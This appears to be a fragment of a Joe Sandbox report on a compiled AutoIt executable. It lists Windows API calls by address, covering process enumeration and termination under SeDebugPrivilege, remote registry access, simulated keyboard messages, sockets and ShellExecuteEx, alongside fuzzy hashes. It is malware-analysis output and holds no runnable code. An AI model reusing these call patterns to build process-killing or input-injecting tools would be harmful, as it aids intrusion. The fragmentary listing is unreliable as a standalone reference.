                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00E8BC1D,00000B00,?,?), ref: 00E8C022
                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00E8BC1D,00000B00,?,?), ref: 00E8C025
                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E8BC1D,00000B00,?,?), ref: 00E8C035
                                                                                                                        • GetCurrentProcess.KERNEL32(00E8BC1D,00000000,?,00E8BC1D,00000B00,?,?), ref: 00E8C03D
                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00E8BC1D,00000B00,?,?), ref: 00E8C040
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00E8C066,00000000,00000000,00000000), ref: 00E8C05A
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                        • String ID:
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00EB9926
                                                                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00EB993A
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EB9954
                                                                                                                        • _wcscat.LIBCMT ref: 00EB99AF
                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00EB99C6
                                                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EB99F4
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window_wcscat
                                                                                                                        • String ID: SysListView32
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E96F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00E96F7D
                                                                                                                          • Part of subcall function 00E96F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00E96F8D
                                                                                                                          • Part of subcall function 00E96F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00E97022
                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EB168B
                                                                                                                        • GetLastError.KERNEL32 ref: 00EB169E
                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EB16CA
                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EB1746
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 00EB1751
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EB1786
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                        • String ID: SeDebugPrivilege
                                                                                                                        APIs
                                                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00E962D6
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: IconLoad
                                                                                                                        • String ID: blank$info$question$stop$warning
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00E97595
                                                                                                                        • LoadStringW.USER32(00000000), ref: 00E9759C
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E975B2
                                                                                                                        • LoadStringW.USER32(00000000), ref: 00E975B9
                                                                                                                        • _wprintf.LIBCMT ref: 00E975DF
                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E975FD
                                                                                                                        Strings
                                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00E975DA
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                        • API String ID: 3648134473-3128320259
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                          • Part of subcall function 00EB3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EB2AA6,?,?), ref: 00EB3B0E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EB2AE7
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3479070676-0
                                                                                                                        APIs
                                                                                                                        • __mtinitlocknum.LIBCMT ref: 00E7B744
                                                                                                                          • Part of subcall function 00E78A0C: __FF_MSGBANNER.LIBCMT ref: 00E78A21
                                                                                                                          • Part of subcall function 00E78A0C: __NMSG_WRITE.LIBCMT ref: 00E78A28
                                                                                                                          • Part of subcall function 00E78A0C: __malloc_crt.LIBCMT ref: 00E78A48
                                                                                                                        • __lock.LIBCMT ref: 00E7B757
                                                                                                                        • __lock.LIBCMT ref: 00E7B7A3
                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00F06948,00000018,00E86C2B,?,00000000,00000109), ref: 00E7B7BF
                                                                                                                        • EnterCriticalSection.KERNEL32(8000000C,00F06948,00000018,00E86C2B,?,00000000,00000109), ref: 00E7B7DC
                                                                                                                        • LeaveCriticalSection.KERNEL32(8000000C), ref: 00E7B7EC
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1422805418-0
                                                                                                                        APIs
                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E9A1CE
                                                                                                                          • Part of subcall function 00E7010A: std::exception::exception.LIBCMT ref: 00E7013E
                                                                                                                          • Part of subcall function 00E7010A: __CxxThrowException@8.LIBCMT ref: 00E70153
                                                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00E9A205
                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00E9A221
                                                                                                                        • _memmove.LIBCMT ref: 00E9A26F
                                                                                                                        • _memmove.LIBCMT ref: 00E9A28C
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00E9A29B
                                                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00E9A2B0
                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E9A2CF
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 256516436-0
                                                                                                                        APIs
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00EB8CF3
                                                                                                                        • GetDC.USER32(00000000), ref: 00EB8CFB
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EB8D06
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00EB8D12
                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00EB8D4E
                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EB8D5F
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EBBB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00EB8D99
                                                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00EB8DB9
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3864802216-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E584A6: __swprintf.LIBCMT ref: 00E584E5
                                                                                                                          • Part of subcall function 00E584A6: __itow.LIBCMT ref: 00E58519
                                                                                                                          • Part of subcall function 00E53BCF: _wcscpy.LIBCMT ref: 00E53BF2
                                                                                                                        • _wcstok.LIBCMT ref: 00EA1D6E
                                                                                                                        • _wcscpy.LIBCMT ref: 00EA1DFD
                                                                                                                        • _memset.LIBCMT ref: 00EA1E30
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                        • String ID: X
                                                                                                                        • API String ID: 774024439-3081909835
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00EB214B
                                                                                                                        • _memset.LIBCMT ref: 00EB2214
                                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00EB2259
                                                                                                                          • Part of subcall function 00E584A6: __swprintf.LIBCMT ref: 00E584E5
                                                                                                                          • Part of subcall function 00E584A6: __itow.LIBCMT ref: 00E58519
                                                                                                                          • Part of subcall function 00E53BCF: _wcscpy.LIBCMT ref: 00E53BF2
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EB2320
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00EB232F
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 4082843840-2766056989
                                                                                                                        • Opcode ID: de1b35171326a2baac64312fa6a14b7665adf3737b382d50da4b797f320ee55c
                                                                                                                        • Instruction ID: 2cbd52f738414d91529aa5bd64038d451c38eed23768bfe9b4a8d46cb6ef0e44
                                                                                                                        • Opcode Fuzzy Hash: de1b35171326a2baac64312fa6a14b7665adf3737b382d50da4b797f320ee55c
                                                                                                                        • Instruction Fuzzy Hash: E7716871A0061A9FCB04EFA8C9819AEBBF5FF48310F109459E956BB361DB30AD44CB90
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32(?), ref: 00E9481D
                                                                                                                        • GetKeyboardState.USER32(?), ref: 00E94832
                                                                                                                        • SetKeyboardState.USER32(?), ref: 00E94893
                                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E948C1
                                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E948E0
                                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E94926
                                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E94949
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 87235514-0
                                                                                                                        • Opcode ID: cb05df8d4f4a8cd6b5028d5667ed85786a7664e77264c041eb6bbad27386dcaa
                                                                                                                        • Instruction ID: 6872786a7d5d9e149ba2e749a50d9fdb896f0cb945500bd643ed09ee79463864
                                                                                                                        • Opcode Fuzzy Hash: cb05df8d4f4a8cd6b5028d5667ed85786a7664e77264c041eb6bbad27386dcaa
                                                                                                                        • Instruction Fuzzy Hash: C251E2E06087D63DFF3A42248C05FBBBFA95B46308F089589F1D9668C2C2D4EC8AD750
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32(00000000), ref: 00E94638
                                                                                                                        • GetKeyboardState.USER32(?), ref: 00E9464D
                                                                                                                        • SetKeyboardState.USER32(?), ref: 00E946AE
                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E946DA
                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E946F7
                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E9473B
                                                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E9475C
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 87235514-0
                                                                                                                        • Opcode ID: 0f1a4313378a3614d62f7884cc85dea319727adbdfc343f06c409ec18c73e238
                                                                                                                        • Instruction ID: a6ccdaad05710c46957e6f25fc6918a5a6b4dd62898b74ef4e909b9c8cfbaed1
                                                                                                                        • Opcode Fuzzy Hash: 0f1a4313378a3614d62f7884cc85dea319727adbdfc343f06c409ec18c73e238
                                                                                                                        • Instruction Fuzzy Hash: A951F1E05047D93DFF3687648C05FBABEA99B06308F08548AE1D4668C3D3A4EC9AD750
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2945705084-0
                                                                                                                        • Opcode ID: ec467e71328dfae165e1cb5d9c8e2b5bcc1f0d0e5458b5d181f26e4b06141256
                                                                                                                        • Instruction ID: 6d337f105fa8cb7b573594fe49aee2cefee318eabeabf2a36aa3fd4bb192e3a4
                                                                                                                        • Opcode Fuzzy Hash: ec467e71328dfae165e1cb5d9c8e2b5bcc1f0d0e5458b5d181f26e4b06141256
                                                                                                                        • Instruction Fuzzy Hash: EC417E65C1025475CF15ABF8C8869CEB7ACEF05310F60E866E618F3232EA30E65587A5
                                                                                                                        APIs
                                                                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00EEDBF0), ref: 00EA9409
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EA9416
                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00EA943A
                                                                                                                        • #16.WSOCK32(?,?,00000000,00000000), ref: 00EA9452
                                                                                                                        • _strlen.LIBCMT ref: 00EA9484
                                                                                                                        • _memmove.LIBCMT ref: 00EA94CA
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EA94F7
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2795762555-0
                                                                                                                        • Opcode ID: 02a714bc7930545f1b2183bac6ed3fdd0d77168d8f11997cfd0b3d187d74edfa
                                                                                                                        • Instruction ID: e43d3ce54b5c68c1262ca6711c9c0ad1f192e362e78de1a026c4b1ea7930d195
                                                                                                                        • Opcode Fuzzy Hash: 02a714bc7930545f1b2183bac6ed3fdd0d77168d8f11997cfd0b3d187d74edfa
                                                                                                                        • Instruction Fuzzy Hash: F441A471504204AFCB04EB64DC95AEEB7B9EF4D314F10555AF516BB2D2DB30AE05CB60
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00EB9DB0
                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EB9E57
                                                                                                                        • IsMenu.USER32(?), ref: 00EB9E6F
                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EB9EB7
                                                                                                                        • DrawMenuBar.USER32 ref: 00EB9ED0
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 3866635326-4108050209
                                                                                                                        • Opcode ID: 121a203bdad689c8493fbd29634a6abbf0af8f32552d5dd5443a03cda7fea6eb
                                                                                                                        • Instruction ID: f84c032bebbab33f0f52cc01c0ace3adbc8e968188782a265fbcaddb9dc29784
                                                                                                                        • Opcode Fuzzy Hash: 121a203bdad689c8493fbd29634a6abbf0af8f32552d5dd5443a03cda7fea6eb
                                                                                                                        • Instruction Fuzzy Hash: 18411775A00209EFDB20DF54E884ADABBF4FF05358F05A069EA15B7262D730ED54DB60
                                                                                                                        APIs
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00EB3C92
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EB3CBC
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00EB3D71
                                                                                                                          • Part of subcall function 00EB3C63: RegCloseKey.ADVAPI32(?), ref: 00EB3CD9
                                                                                                                          • Part of subcall function 00EB3C63: FreeLibrary.KERNEL32(?), ref: 00EB3D2B
                                                                                                                          • Part of subcall function 00EB3C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00EB3D4E
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00EB3D16
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 395352322-0
                                                                                                                        • Opcode ID: 821662f082c2a571fc6b628a09fc097a4bbc3eb3e0c83cec080c637878da67f8
                                                                                                                        • Instruction ID: 3f6d024042bd57d60c48a0c5e556536e27b80287cac10c4efe6ee87d89408d3b
                                                                                                                        • Opcode Fuzzy Hash: 821662f082c2a571fc6b628a09fc097a4bbc3eb3e0c83cec080c637878da67f8
                                                                                                                        • Instruction Fuzzy Hash: E0310971901209BFDB149BE5DC8AAFFBBBDEF08304F10516AA512F2151DA709F499B60
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00EB8DF4
                                                                                                                        • GetWindowLongW.USER32(0114A8F0,000000F0), ref: 00EB8E27
                                                                                                                        • GetWindowLongW.USER32(0114A8F0,000000F0), ref: 00EB8E5C
                                                                                                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00EB8E8E
                                                                                                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00EB8EB8
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EB8EC9
                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EB8EE3
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow$MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2178440468-0
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E91734
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E9175A
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00E9175D
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00E9177B
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00E91784
                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00E917A9
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00E917B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3761583154-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E531B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00E531DA
                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00E96A2B
                                                                                                                        • _wcscmp.LIBCMT ref: 00E96A49
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00E96A62
                                                                                                                          • Part of subcall function 00E96D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00E96DBA
                                                                                                                          • Part of subcall function 00E96D6D: GetLastError.KERNEL32 ref: 00E96DC5
                                                                                                                          • Part of subcall function 00E96D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00E96DD9
                                                                                                                        • _wcscat.LIBCMT ref: 00E96AA4
                                                                                                                        • SHFileOperationW.SHELL32(?), ref: 00E96B0C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 2323102230-1173974218
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsnicmp
                                                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                        • API String ID: 1038674560-2734436370
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E9180D
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E91833
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00E91836
                                                                                                                        • SysAllocString.OLEAUT32 ref: 00E91857
                                                                                                                        • SysFreeString.OLEAUT32 ref: 00E91860
                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00E9187A
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00E91888
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3761583154-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E6C657
                                                                                                                          • Part of subcall function 00E6C619: GetStockObject.GDI32(00000011), ref: 00E6C66B
                                                                                                                          • Part of subcall function 00E6C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E6C675
                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EBA13B
                                                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EBA148
                                                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EBA153
                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EBA162
                                                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EBA16E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                        • String ID: Msctls_Progress32
                                                                                                                        • API String ID: 1025951953-3636473452
                                                                                                                        APIs
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00E6C6C0
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00E6C701
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00E6C729
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00E6C856
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00E6C86F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1296646539-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$__itow__swprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3253778849-0
                                                                                                                        APIs
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00EB1B09
                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00EB1B17
                                                                                                                        • __wsplitpath.LIBCMT ref: 00EB1B45
                                                                                                                          • Part of subcall function 00E7297D: __wsplitpath_helper.LIBCMT ref: 00E729BD
                                                                                                                        • _wcscat.LIBCMT ref: 00EB1B5A
                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00EB1BD0
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00EB1BE2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                          • Part of subcall function 00EB3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EB2AA6,?,?), ref: 00EB3B0E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EB2FA0
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EB2FE0
                                                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00EB3003
                                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00EB302C
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EB306F
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00EB307C
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscpy$_wcscat
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00E92AF6
                                                                                                                        • VariantClear.OLEAUT32(00000013), ref: 00E92B68
                                                                                                                        • VariantClear.OLEAUT32(00000000), ref: 00E92BC3
                                                                                                                        • _memmove.LIBCMT ref: 00E92BED
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00E92C3A
                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E92C68
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                        APIs
                                                                                                                        • GetMenu.USER32(?), ref: 00EB833D
                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00EB8374
                                                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00EB839C
                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 00EB840B
                                                                                                                        • GetSubMenu.USER32(?,?), ref: 00EB8419
                                                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00EB846A
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00E9552E
                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E95579
                                                                                                                        • IsMenu.USER32(00000000), ref: 00E95599
                                                                                                                        • CreatePopupMenu.USER32 ref: 00E955CD
                                                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00E9562B
                                                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E9565C
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00E6AF8E
                                                                                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 00E6B1C1
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00E6B225
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00E6B242
                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E6B253
                                                                                                                        • EndPaint.USER32(?,?), ref: 00E6B29D
                                                                                                                        Similarity
                                                                                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(00F11810,00000000,?,?,00F11810,00F11810,?,00ECE2D6), ref: 00EBE21B
                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00EBE23F
                                                                                                                        • ShowWindow.USER32(00F11810,00000000,?,?,00F11810,00F11810,?,00ECE2D6), ref: 00EBE29F
                                                                                                                        • ShowWindow.USER32(?,00000004,?,?,00F11810,00F11810,?,00ECE2D6), ref: 00EBE2B1
                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00EBE2D5
                                                                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00EBE2F8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
